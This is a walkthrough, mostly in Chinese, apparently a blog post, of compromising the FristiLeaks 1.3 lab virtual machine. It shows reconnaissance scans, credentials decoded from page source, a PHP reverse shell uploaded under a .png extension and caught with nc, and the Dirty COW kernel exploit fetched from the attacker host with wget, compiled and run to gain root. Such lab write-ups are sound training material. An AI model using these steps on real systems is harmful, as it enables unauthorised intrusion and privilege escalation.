FRISTILEAKS:1.3 Walkthrough
Reconnaissance
Host Discovery
1
2
3
4
5
6
$ netdiscover
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.50.129 08:00:27:a5:a6:76 1 60 PCS Systemtechnik GmbH
Port Scanning
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nmap -A -sV -sC 192.168.50.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-21 12:29 EDT
Nmap scan report for 192.168.50.129
Host is up (0.00096s latency).
Not shown: 989 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.96 ms 192.168.50.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.47 seconds
Enumeration
HTTP Enumeration
进入网页,没有发现什么重要信息,接着查看源码,发现了一个路径,尝试访问,只是两张图片,依旧没有任何值得利用的信息
决定使用nikto进行扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ nikto -h 192.168.50.129
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.50.129
+ Target Hostname: 192.168.50.129
+ Target Port: 80
+ Start Time: 2024-06-21 12:38:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8911 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2024-06-21 12:39:19 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
根据nikto的扫描结果显示五个目录分别是/beer /cola /sisi /icons /images 对他们进行访问,其中beer cola sisi都返回了相同的图片。
经过一段时间,我想到了主页上写着“Keep Calm and Drink Fristi”,而上面扫描的目录也有部分饮品,我尝试路径为/fristi成功进入到一个登陆页面。
Exploitation
尝试了一些弱口令用于登陆,都无法登陆,查看源代码发现了疑似用户的评论eezeepz,还有一个base64图像,接着对其进行解密。
尝试利用这些提示进行登陆,username:eezeepz password:keKkeKKeKKeKkEkkEk ,成功登陆,获得一个上传文件的页面
我随意的上传了一个文件,提示只能上传png jpg gif文件
这里我使用了一个PHP反弹shell并将后缀名改为.png进行上传成功,在攻击机进行监听,在访问该文件后成功拿到shell
1
2
3
4
5
6
7
8
9
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.50.128] from (UNKNOWN) [192.168.50.129] 54555
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
22:05:53 up 1:38, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
Privilege Escalation
查看内核的版本
1
2
3
#Target Terminal
sh-4.1$ cat /proc/version
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015
确定其版本为2.6.32,接着使用searchsploit查询是否有可利用的漏洞,这里我们使用Dirty Cow 40839.c
1
2
3
4
5
6
7
8
9
10
11
#Kali Linux Terminal
$ searchsploit Linux 2.6.32 Privilege Dirty COW
------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------ ---------------------------------
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race C | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition P | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Conditio | linux/local/40839.c
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
我们需要进入的/tmp目录下,下载40839.c文件,然后查看代码注释后进行编译,然后执行,这里需要设置密码,我就为空了,之后将用户切换为firefart即可。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#Target Terminal
sh-4.1$ cd /tmp
sh-4.1$ wget http://192.168.50.128/40839.c
sh-4.1$ gcc -pthread 40839.c -o dirty -lcrypt
sh-4.1$ ./dirty
./dirty
Please enter the new password:
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash
mmap: 7ffa62027000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password ''.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
su firefart
standard in must be a tty #使用Python绕过去
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ su firefart
su firefart
Password:
firefart@localhost tmp]#
查询root目录下文件成功拿到Flag
###
This post is licensed under
CC BY 4.0
by the author.